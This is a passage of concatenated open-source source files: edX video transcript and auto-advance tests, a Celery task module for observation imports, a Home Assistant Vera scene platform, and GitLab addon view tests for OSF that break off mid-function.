language: "{edx_video_id}-{language}.srt".format(
edx_video_id=self.descriptor.edx_video_id,
language=language
)
for language in languages
}
self.assertDictEqual(json.loads(video_xml.get('transcripts')), expected_transcripts)
# Assert transcript content from course OLX
for language in languages:
expected_transcript_path = combine(
combine(self.temp_dir, EXPORT_IMPORT_COURSE_DIR),
combine(EXPORT_IMPORT_STATIC_DIR, expected_transcripts[language])
)
expected_transcript_content = File(open(expected_transcript_path)).read()
transcript = get_video_transcript_data(video_id=self.descriptor.edx_video_id, language_code=language)
self.assertEqual(transcript['content'], expected_transcript_content)
def test_export_val_data_not_found(self):
"""
Tests that external video export works as expected.
"""
self.descriptor.edx_video_id = 'nonexistent'
actual = self.descriptor.definition_to_xml(resource_fs=self.file_system)
expected_str = """<video download_video="false" url_name="SampleProblem"/>"""
parser = etree.XMLParser(remove_blank_text=True)
expected = etree.XML(expected_str, parser=parser)
self.assertXmlEqual(expected, actual)
@patch('xmodule.video_module.transcripts_utils.get_video_ids_info')
def test_export_no_video_ids(self, mock_get_video_ids_info):
"""
Tests export when there is no video id. `export_to_xml` only works in case of video id.
"""
mock_get_video_ids_info.return_value = True, []
actual = self.descriptor.definition_to_xml(resource_fs=self.file_system)
expected_str = '<video url_name="SampleProblem" download_video="false"></video>'
parser = etree.XMLParser(remove_blank_text=True)
expected = etree.XML(expected_str, parser=parser)
self.assertXmlEqual(expected, actual)
def test_import_val_data_internal(self):
"""
Test that import val data internal works as expected.
"""
create_profile('mobile')
module_system = DummySystem(load_error_modules=True)
edx_video_id = 'test_edx_video_id'
sub_id = '0CzPOIIdUsA'
external_transcript_name = 'The_Flash.srt'
external_transcript_language_code = 'ur'
val_transcript_language_code = 'ar'
val_transcript_provider = 'Cielo24'
external_transcripts = {
external_transcript_language_code: external_transcript_name
}
# Create static directory in import file system and place transcript files inside it.
module_system.resources_fs.makedirs(EXPORT_IMPORT_STATIC_DIR, recreate=True)
# Create VAL transcript.
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
'test_edx_video_id-ar.srt',
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
# Create self.sub and self.transcripts transcript.
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
subs_filename(sub_id, self.descriptor.transcript_language),
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
external_transcript_name,
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
xml_data = """
<video edx_video_id='{edx_video_id}' sub='{sub_id}' transcripts='{transcripts}'>
<video_asset client_video_id="test_client_video_id" duration="111.0">
<encoded_video profile="mobile" url="http://example.com/video" file_size="222" bitrate="333"/>
<transcripts>
<transcript file_format="srt" language_code="{val_transcript_language_code}" provider="{val_transcript_provider}"/>
</transcripts>
</video_asset>
</video>
""".format(
edx_video_id=edx_video_id,
sub_id=sub_id,
transcripts=json.dumps(external_transcripts),
val_transcript_language_code=val_transcript_language_code,
val_transcript_provider=val_transcript_provider
)
id_generator = Mock()
id_generator.target_course_id = "test_course_id"
video = self.descriptor.from_xml(xml_data, module_system, id_generator)
self.assertEqual(video.edx_video_id, 'test_edx_video_id')
video_data = get_video_info(video.edx_video_id)
self.assertEqual(video_data['client_video_id'], 'test_client_video_id')
self.assertEqual(video_data['duration'], 111.0)
self.assertEqual(video_data['status'], 'imported')
self.assertEqual(video_data['courses'], [{id_generator.target_course_id: None}])
self.assertEqual(video_data['encoded_videos'][0]['profile'], 'mobile')
self.assertEqual(video_data['encoded_videos'][0]['url'], 'http://example.com/video')
self.assertEqual(video_data['encoded_videos'][0]['file_size'], 222)
self.assertEqual(video_data['encoded_videos'][0]['bitrate'], 333)
# Verify that VAL transcript is imported.
self.assertDictContainsSubset(
self.get_video_transcript_data(
edx_video_id,
language_code=val_transcript_language_code,
provider=val_transcript_provider
),
get_video_transcript(video.edx_video_id, val_transcript_language_code)
)
# Verify that transcript from sub field is imported.
self.assertDictContainsSubset(
self.get_video_transcript_data(
edx_video_id,
language_code=self.descriptor.transcript_language
),
get_video_transcript(video.edx_video_id, self.descriptor.transcript_language)
)
# Verify that transcript from transcript field is imported.
self.assertDictContainsSubset(
self.get_video_transcript_data(
edx_video_id,
language_code=external_transcript_language_code
),
get_video_transcript(video.edx_video_id, external_transcript_language_code)
)
def test_import_no_video_id(self):
"""
Test that importing a video with no video id, creates a new external video.
"""
xml_data = """<video><video_asset></video_asset></video>"""
module_system = DummySystem(load_error_modules=True)
id_generator = Mock()
# Verify edx_video_id is empty before.
self.assertEqual(self.descriptor.edx_video_id, u'')
video = self.descriptor.from_xml(xml_data, module_system, id_generator)
# Verify edx_video_id is populated after the import.
self.assertNotEqual(video.edx_video_id, u'')
video_data = get_video_info(video.edx_video_id)
self.assertEqual(video_data['client_video_id'], 'External Video')
self.assertEqual(video_data['duration'], 0.0)
self.assertEqual(video_data['status'], 'external')
def test_import_val_transcript(self):
"""
Test that importing a video with val transcript, creates a new transcript record.
"""
edx_video_id = 'test_edx_video_id'
val_transcript_language_code = 'es'
val_transcript_provider = 'Cielo24'
xml_data = """
<video edx_video_id='{edx_video_id}'>
<video_asset client_video_id="test_client_video_id" duration="111.0">
<transcripts>
<transcript file_format="srt" language_code="{val_transcript_language_code}" provider="{val_transcript_provider}"/>
</transcripts>
</video_asset>
</video>
""".format(
edx_video_id=edx_video_id,
val_transcript_language_code=val_transcript_language_code,
val_transcript_provider=val_transcript_provider
)
module_system = DummySystem(load_error_modules=True)
id_generator = Mock()
# Create static directory in import file system and place transcript files inside it.
module_system.resources_fs.makedirs(EXPORT_IMPORT_STATIC_DIR, recreate=True)
# Create VAL transcript.
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
'test_edx_video_id-es.srt',
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
# Verify edx_video_id is empty before.
self.assertEqual(self.descriptor.edx_video_id, u'')
video = self.descriptor.from_xml(xml_data, module_system, id_generator)
# Verify edx_video_id is populated after the import.
self.assertNotEqual(video.edx_video_id, u'')
video_data = get_video_info(video.edx_video_id)
self.assertEqual(video_data['status'], 'imported')
# Verify that VAL transcript is imported.
self.assertDictContainsSubset(
self.get_video_transcript_data(
edx_video_id,
language_code=val_transcript_language_code,
provider=val_transcript_provider
),
get_video_transcript(video.edx_video_id, val_transcript_language_code)
)
@ddt.data(
(
'test_sub_id',
{'en': 'The_Flash.srt'},
'<transcripts><transcript file_format="srt" language_code="en" provider="Cielo24"/></transcripts>',
# VAL transcript takes priority
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'srt',
'provider': 'Cielo24'
}
),
(
'',
{'en': 'The_Flash.srt'},
'<transcripts><transcript file_format="srt" language_code="en" provider="Cielo24"/></transcripts>',
# VAL transcript takes priority
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'srt',
'provider': 'Cielo24'
}
),
(
'test_sub_id',
{},
'<transcripts><transcript file_format="srt" language_code="en" provider="Cielo24"/></transcripts>',
# VAL transcript takes priority
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'srt',
'provider': 'Cielo24'
}
),
(
'test_sub_id',
{'en': 'The_Flash.srt'},
'',
# self.sub transcript takes priority
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'sjson',
'provider': 'Custom'
}
),
(
'',
{'en': 'The_Flash.srt'},
'',
# self.transcripts would be saved.
{
'video_id': u'test_edx_video_id',
'language_code': u'en',
'file_format': 'srt',
'provider': 'Custom'
}
)
)
@ddt.unpack
def test_import_val_transcript_priority(self, sub_id, external_transcripts, val_transcripts, expected_transcript):
"""
Test that importing a video with different type of transcripts for same language,
creates expected transcript record.
"""
edx_video_id = 'test_edx_video_id'
language_code = 'en'
module_system = DummySystem(load_error_modules=True)
id_generator = Mock()
# Create static directory in import file system and place transcript files inside it.
module_system.resources_fs.makedirs(EXPORT_IMPORT_STATIC_DIR, recreate=True)
xml_data = "<video edx_video_id='test_edx_video_id'"
# Prepare self.sub transcript data.
if sub_id:
create_file_in_fs(
TRANSCRIPT_FILE_SJSON_DATA,
subs_filename(sub_id, language_code),
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
xml_data += " sub='{sub_id}'".format(
sub_id=sub_id
)
# Prepare self.transcripts transcripts data.
if external_transcripts:
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
external_transcripts['en'],
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
xml_data += " transcripts='{transcripts}'".format(
transcripts=json.dumps(external_transcripts),
)
xml_data += '><video_asset client_video_id="test_client_video_id" duration="111.0">'
# Prepare VAL transcripts data.
if val_transcripts:
create_file_in_fs(
TRANSCRIPT_FILE_SRT_DATA,
'{edx_video_id}-{language_code}.srt'.format(
edx_video_id=edx_video_id,
language_code=language_code
),
module_system.resources_fs,
EXPORT_IMPORT_STATIC_DIR
)
xml_data += val_transcripts
xml_data += '</video_asset></video>'
# Verify edx_video_id is empty before import.
self.assertEqual(self.descriptor.edx_video_id, u'')
video = self.descriptor.from_xml(xml_data, module_system, id_generator)
# Verify edx_video_id is not empty after import.
self.assertNotEqual(video.edx_video_id, u'')
video_data = get_video_info(video.edx_video_id)
self.assertEqual(video_data['status'], 'imported')
# Verify that correct transcripts are imported.
self.assertDictContainsSubset(
expected_transcript,
get_video_transcript(video.edx_video_id, language_code)
)
def test_import_val_data_invalid(self):
create_profile('mobile')
module_system = DummySystem(load_error_modules=True)
# Negative file_size is invalid
xml_data = """
<video edx_video_id="test_edx_video_id">
<video_asset client_video_id="test_client_video_id" duration="111.0">
<encoded_video profile="mobile" url="http://example.com/video" file_size="-222" bitrate="333"/>
</video_asset>
</video>
"""
with self.assertRaises(ValCannotCreateError):
VideoDescriptor.from_xml(xml_data, module_system, id_generator=Mock())
with self.assertRaises(ValVideoNotFoundError):
get_video_info("test_edx_video_id")
class TestVideoWithBumper(TestVideo):
"""
Tests rendered content in presence of video bumper.
"""
CATEGORY = "video"
METADATA = {}
# Use temporary FEATURES in this test without affecting the original
FEATURES = dict(settings.FEATURES)
@patch('xmodule.video_module.bumper_utils.get_bumper_settings')
def test_is_bumper_enabled(self, get_bumper_settings):
"""
Check that bumper is (not)shown if ENABLE_VIDEO_BUMPER is (False)True
Assume that bumper settings are correct.
"""
self.FEATURES.update({
"SHOW_BUMPER_PERIODICITY": 1,
"ENABLE_VIDEO_BUMPER": True,
})
get_bumper_settings.return_value = {
"video_id": "edx_video_id",
"transcripts": {},
}
with override_settings(FEATURES=self.FEATURES):
self.assertTrue(bumper_utils.is_bumper_enabled(self.item_descriptor))
self.FEATURES.update({"ENABLE_VIDEO_BUMPER": False})
with override_settings(FEATURES=self.FEATURES):
self.assertFalse(bumper_utils.is_bumper_enabled(self.item_descriptor))
@patch('xmodule.video_module.bumper_utils.is_bumper_enabled')
@patch('xmodule.video_module.bumper_utils.get_bumper_settings')
@patch('edxval.api.get_urls_for_profiles')
def test_bumper_metadata(self, get_url_for_profiles, get_bumper_settings, is_bumper_enabled):
"""
Test content with rendered bumper metadata.
"""
get_url_for_profiles.return_value = {
'desktop_mp4': 'http://test_bumper.mp4',
'desktop_webm': '',
}
get_bumper_settings.return_value = {
'video_id': 'edx_video_id',
'transcripts': {},
}
is_bumper_enabled.return_value = True
content = self.item_descriptor.render(STUDENT_VIEW).content
sources = [u'example.mp4', u'example.webm']
expected_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': json.dumps(OrderedDict({
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'showCaptions': 'true',
'sources': ['http://test_bumper.mp4'],
'streams': '',
'transcriptLanguage': 'en',
'transcriptLanguages': {'en': 'English'},
'transcriptTranslationUrl': video_utils.set_query_parameter(
self.get_handler_url('transcript', 'translation/__lang__'), 'is_bumper', 1
),
'transcriptAvailableTranslationsUrl': video_utils.set_query_parameter(
self.get_handler_url('transcript', 'available_translations'), 'is_bumper', 1
),
"publishCompletionUrl": video_utils.set_query_parameter(
self.get_handler_url('publish_completion', ''), 'is_bumper', 1
),
})),
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': json.dumps(OrderedDict({
'autoAdvance': False,
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'autoplay': False,
'streams': '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg',
'sources': sources,
'poster': None,
'duration': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English', 'uk': u'Українська'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': json.dumps(OrderedDict({
'url': 'http://img.youtube.com/vi/ZwkTiUPN0mg/0.jpg',
'type': 'youtube'
}))
}
expected_content = self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
self.assertEqual(content, expected_content)
@ddt.ddt
class TestAutoAdvanceVideo(TestVideo):
"""
Tests the server side of video auto-advance.
"""
CATEGORY = "video"
METADATA = {}
# Use temporary FEATURES in this test without affecting the original
FEATURES = dict(settings.FEATURES)
def prepare_expected_context(self, autoadvanceenabled_flag, autoadvance_flag):
"""
Build a dictionary with data expected by some operations in this test.
Only parameters related to auto-advance are variable, rest is fixed.
"""
context = {
'autoadvance_enabled': autoadvanceenabled_flag,
'branding_info': None,
'license': None,
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'bumper_metadata': 'null',
'metadata': json.dumps(OrderedDict({
'autoAdvance': autoadvance_flag,
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'autoplay': False,
'streams': '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg',
'sources': [u'example.mp4', u'example.webm'],
'duration': None,
'poster': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English', 'uk': u'Українська'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.item_descriptor.xmodule_runtime.handler_url(
self.item_descriptor, 'transcript', 'translation/__lang__'
).rstrip('/?'),
'transcriptAvailableTranslationsUrl': self.item_descriptor.xmodule_runtime.handler_url(
self.item_descriptor, 'transcript', 'available_translations'
).rstrip('/?'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null'
}
return context
def assert_content_matches_expectations(self, autoadvanceenabled_must_be, autoadvance_must_be):
"""
Check (assert) that loading video.html produces content that corresponds
to the passed context.
Helper function to avoid code repetition.
"""
with override_settings(FEATURES=self.FEATURES):
content = self.item_descriptor.render(STUDENT_VIEW).content
expected_context = self.prepare_expected_context(
autoadvanceenabled_flag=autoadvanceenabled_must_be,
autoadvance_flag=autoadvance_must_be,
)
with override_settings(FEATURES=self.FEATURES):
expected_content = self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context)
self.assertEqual(content, expected_content)
def change_course_setting_autoadvance(self, new_value):
"""
Change the .video_auto_advance course setting (a.k.a. advanced setting).
This avoids doing .save(), and instead modifies the instance directly.
Based on test code for video_bumper setting.
"""
# This first render is done to initialize the instance
self.item_descriptor.render(STUDENT_VIEW)
item_instance = self.item_descriptor.xmodule_runtime.xmodule_instance
item_instance.video_auto_advance = new_value
# After this step, render() should see the new value
# e.g. use self.item_descriptor.render(STUDENT_VIEW).content
@ddt.data(
(False, False),
(False, True),
(True, False),
(True, True),
)
@ddt.unpack
def test_is_autoadvance_available_and_enabled(self, global_setting, course_setting):
"""
Check that the autoadvance is not available when it is disabled via feature flag
(ENABLE_AUTOADVANCE_VIDEOS set to False) or by the course setting.
It checks that:
- only when the feature flag and the course setting are True (at the same time)
the controls are visible
- in that case (when the controls are visible) the video will autoadvance
(because that's the default), in other cases it won't
"""
self.FEATURES.update({"ENABLE_AUTOADVANCE_VIDEOS": global_setting})
self.change_course_setting_autoadvance(new_value=course_setting)
self.assert_content_matches_expectations(
autoadvanceenabled_must_be=(global_setting and course_setting),
autoadvance_must_be=(global_setting and course_setting),
)
| agpl-3.0 |
gis4dis/poster | apps/processing/pmo/tasks.py | 1 | 3380 | from __future__ import absolute_import, unicode_literals
import os
from datetime import timedelta, datetime
from celery.task import task, group
from celery.utils.log import get_task_logger
from django.conf import settings
from django.core.files.storage import default_storage
from django.core.management import call_command
from apps.processing.pmo.models import WatercourseObservation, WeatherObservation
from apps.processing.pmo.util import util
from apps.utils.time import UTC_P0100
logger = get_task_logger(__name__)
@task(name="pmo.import")
def import_default(*args):
try:
call_command('pmo_import', *args)
except Exception as e:
logger.critical(e)
def get_last_record(model):
try:
last_item = model.objects.all().latest('phenomenon_time_range')
except model.DoesNotExist:
last_item = None
return last_item
# https://github.com/gis4dis/poster/issues/111
# Substitute '/import/' for django.conf.settings.IMPORT_ROOT
basedir_def = os.path.join(settings.IMPORT_ROOT, 'apps.processing.pmo', '')
@task(name="pmo.import_hod_observation")
def import_hod_observation(date_str):
date_obj = datetime.strptime(date_str, "%Y%m%d").date()
logger.info('Importing HOD file: ' + str(date_obj))
util.load_hod(date_obj)
@task(name="pmo.import_srazsae_observation")
def import_srazsae_observation(date_str):
date = datetime.strptime(date_str, "%Y%m%d").date()
logger.info('Importing srazsae file: ' + str(date))
util.load_srazsae(date)
def get_dates_to_import(model, file):
last_record = get_last_record(model)
dates_to_import = []
if last_record is not None:
start_day = last_record.phenomenon_time_range.lower
start_day = start_day.replace(hour=0, minute=0, second=0, microsecond=0)
start_day = start_day + timedelta(1)
start_day = start_day.replace(tzinfo=UTC_P0100)
now = datetime.now()
now = now.replace(tzinfo=UTC_P0100)
today = now.replace(hour=0, minute=0, second=0, microsecond=0)
day_to = today
day = start_day
while day <= day_to:
day_str = day.strftime("%Y%m%d")
path = basedir_def + day_str + '/' + str(file)
if default_storage.exists(path):
dates_to_import.append(day_str)
day += timedelta(1)
else:
listed = default_storage.listdir(basedir_def)
for filename in listed:
if filename.is_dir:
folder_path = filename.object_name
path = folder_path + '/' + str(file)
if default_storage.exists(path):
day_str = filename.object_name.strip("/").split('/')[-1]
dates_to_import.append(day_str)
return dates_to_import
@task(name="pmo.import_observations")
def import_observations():
watercourse_dates_to_import = get_dates_to_import(WatercourseObservation, 'HOD.dat')
srazsae_dates_to_import = get_dates_to_import(WeatherObservation, 'srazsae.dat')
try:
g = group(import_hod_observation.s(date) for date in watercourse_dates_to_import)
g.apply_async()
except Exception as e:
logger.critical(e)
try:
g = group(import_srazsae_observation.s(date) for date in srazsae_dates_to_import)
g.apply_async()
except Exception as e:
logger.critical(e)
| bsd-3-clause |
Teagan42/home-assistant | homeassistant/components/vera/scene.py | 7 | 1421 | """Support for Vera scenes."""
import logging
from homeassistant.components.scene import Scene
from homeassistant.util import slugify
from . import VERA_CONTROLLER, VERA_ID_FORMAT, VERA_SCENES
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Vera scenes."""
add_entities(
[
VeraScene(scene, hass.data[VERA_CONTROLLER])
for scene in hass.data[VERA_SCENES]
],
True,
)
class VeraScene(Scene):
"""Representation of a Vera scene entity."""
def __init__(self, vera_scene, controller):
"""Initialize the scene."""
self.vera_scene = vera_scene
self.controller = controller
self._name = self.vera_scene.name
# Append device id to prevent name clashes in HA.
self.vera_id = VERA_ID_FORMAT.format(
slugify(vera_scene.name), vera_scene.scene_id
)
def update(self):
"""Update the scene status."""
self.vera_scene.refresh()
def activate(self):
"""Activate the scene."""
self.vera_scene.activate()
@property
def name(self):
"""Return the name of the scene."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes of the scene."""
return {"vera_scene_id": self.vera_scene.vera_scene_id}
| apache-2.0 |
Johnetordoff/osf.io | addons/gitlab/tests/test_views.py | 6 | 24875 | # -*- coding: utf-8 -*-
from rest_framework import status as http_status
import mock
import datetime
import pytest
import unittest
from json import dumps
from nose.tools import * # noqa (PEP8 asserts)
from tests.base import OsfTestCase, get_default_metaschema
from osf_tests.factories import ProjectFactory, UserFactory, AuthUserFactory, DraftRegistrationFactory
from github3.repos.branch import Branch
from framework.exceptions import HTTPError
from framework.auth import Auth
from addons.base.tests.views import (
OAuthAddonAuthViewsTestCaseMixin, OAuthAddonConfigViewsTestCaseMixin
)
from addons.gitlab import utils
from addons.gitlab.api import GitLabClient
from addons.gitlab.serializer import GitLabSerializer
from addons.gitlab.utils import check_permissions
from addons.gitlab.tests.utils import create_mock_gitlab, GitLabAddonTestCase
from addons.gitlab.tests.factories import GitLabAccountFactory
pytestmark = pytest.mark.django_db
class TestGitLabAuthViews(GitLabAddonTestCase, OAuthAddonAuthViewsTestCaseMixin, OsfTestCase):
@mock.patch(
'addons.gitlab.models.UserSettings.revoke_remote_oauth_access',
mock.PropertyMock()
)
def test_delete_external_account(self):
super(TestGitLabAuthViews, self).test_delete_external_account()
def test_oauth_start(self):
pass
def test_oauth_finish(self):
pass
class TestGitLabConfigViews(GitLabAddonTestCase, OAuthAddonConfigViewsTestCaseMixin, OsfTestCase):
folder = None
Serializer = GitLabSerializer
client = GitLabClient
## Overrides ##
def setUp(self):
super(TestGitLabConfigViews, self).setUp()
self.mock_api_user = mock.patch('addons.gitlab.api.GitLabClient.user')
self.mock_api_user.return_value = mock.Mock()
self.mock_api_user.start()
def tearDown(self):
self.mock_api_user.stop()
super(TestGitLabConfigViews, self).tearDown()
def test_folder_list(self):
# GH only lists root folder (repos), this test is superfluous
pass
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.views.GitLabClient.repo')
def test_set_config(self, mock_repo, mock_add_hook):
# GH selects repos, not folders, so this needs to be overriden
mock_repo.return_value = 'repo_name'
url = self.project.api_url_for('{0}_set_config'.format(self.ADDON_SHORT_NAME))
res = self.app.post_json(url, {
'gitlab_user': 'octocat',
'gitlab_repo': 'repo_name',
'gitlab_repo_id': '123',
}, auth=self.user.auth)
assert_equal(res.status_code, http_status.HTTP_200_OK)
self.project.reload()
assert_equal(
self.project.logs.latest().action,
'{0}_repo_linked'.format(self.ADDON_SHORT_NAME)
)
mock_add_hook.assert_called_once_with(save=False)
# TODO: Test remaining CRUD methods
# TODO: Test exception handling
class TestCRUD(OsfTestCase):
def setUp(self):
super(TestCRUD, self).setUp()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.project = ProjectFactory(creator=self.user)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.node_settings.user_settings = self.project.creator.get_addon('gitlab')
# Set the node addon settings to correspond to the values of the mock repo
self.node_settings.user = self.gitlab.repo.return_value.owner.login
self.node_settings.repo = self.gitlab.repo.return_value.name
self.node_settings.save()
class TestGitLabViews(OsfTestCase):
def setUp(self):
super(TestGitLabViews, self).setUp()
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.project = ProjectFactory(creator=self.user)
self.non_authenticator = UserFactory()
self.project.add_contributor(
contributor=self.non_authenticator,
auth=self.consolidated_auth,
)
self.project.save()
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.project.creator.external_accounts.add(GitLabAccountFactory())
self.project.creator.save()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.node_settings = self.project.get_addon('gitlab')
self.node_settings.user_settings = self.project.creator.get_addon('gitlab')
# Set the node addon settings to correspond to the values of the mock repo
self.node_settings.user = 'fred'
self.node_settings.repo = 'mock-repo'
self.node_settings.repo_id = 1748448
self.node_settings.save()
def _get_sha_for_branch(self, branch=None, mock_branches=None):
gitlab_mock = self.gitlab
if mock_branches is None:
mock_branches = gitlab_mock.branches
if branch is None: # Get default branch name
branch = self.gitlab.repo.default_branch
for each in mock_branches:
if each.name == branch:
branch_sha = each.commit['id']
return branch_sha
# Tests for _get_refs
@mock.patch('addons.gitlab.api.GitLabClient.branches')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_get_refs_defaults(self, mock_repo, mock_branches):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo
mock_branches.return_value = gitlab_mock.branches.return_value
branch, sha, branches = utils.get_refs(self.node_settings)
assert_equal(
branch,
gitlab_mock.repo.default_branch
)
assert_equal(sha, branches[0].commit['id']) # Get refs for default branch
assert_equal(
branches,
gitlab_mock.branches.return_value
)
@mock.patch('addons.gitlab.api.GitLabClient.branches')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_get_refs_branch(self, mock_repo, mock_branches):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
mock_branches.return_value = gitlab_mock.branches.return_value
branch, sha, branches = utils.get_refs(self.node_settings, 'master')
assert_equal(branch, 'master')
assert_equal(sha, branches[0].commit['id'])
assert_equal(
branches,
gitlab_mock.branches.return_value
)
def test_before_fork(self):
url = self.project.api_url + 'fork/before/'
res = self.app.get(url, auth=self.user.auth).maybe_follow()
assert_equal(len(res.json['prompts']), 1)
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
def test_before_register(self, mock_has_auth):
mock_has_auth.return_value = True
url = self.project.api_url + 'beforeregister/'
res = self.app.get(url, auth=self.user.auth).maybe_follow()
assert_true('GitLab' in res.json['prompts'][1])
def test_get_refs_sha_no_branch(self):
with assert_raises(HTTPError):
utils.get_refs(self.node_settings, sha='12345')
# Tests for _check_permissions
# make a user with no authorization; make sure check_permissions returns false
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_no_auth(self, mock_repo):
gitlab_mock = self.gitlab
# project is set to private right now
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
connection = gitlab_mock
non_authenticated_user = UserFactory()
non_authenticated_auth = Auth(user=non_authenticated_user)
branch = 'master'
assert_false(check_permissions(self.node_settings, non_authenticated_auth, connection, branch, repo=mock_repository))
# make a repository that doesn't allow push access for this user;
# make sure check_permissions returns false
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_no_access(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
branch = 'master'
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, branch, repo=mock_repository))
# make a branch with a different commit than the commit being passed into check_permissions
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_not_head(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
mock_branch = mock.Mock(**{
'commit': {'id': '67890'}
})
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
connection.branches.return_value = mock_branch
sha = '12345'
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, mock_branch, sha=sha, repo=mock_repository))
# make sure permissions are not granted for editing a registration
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
with mock.patch('osf.models.node.AbstractNode.is_registration', new_callable=mock.PropertyMock) as mock_is_reg:
mock_is_reg.return_value = True
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, 'master', repo=mock_repository))
def check_hook_urls(self, urls, node, path, sha):
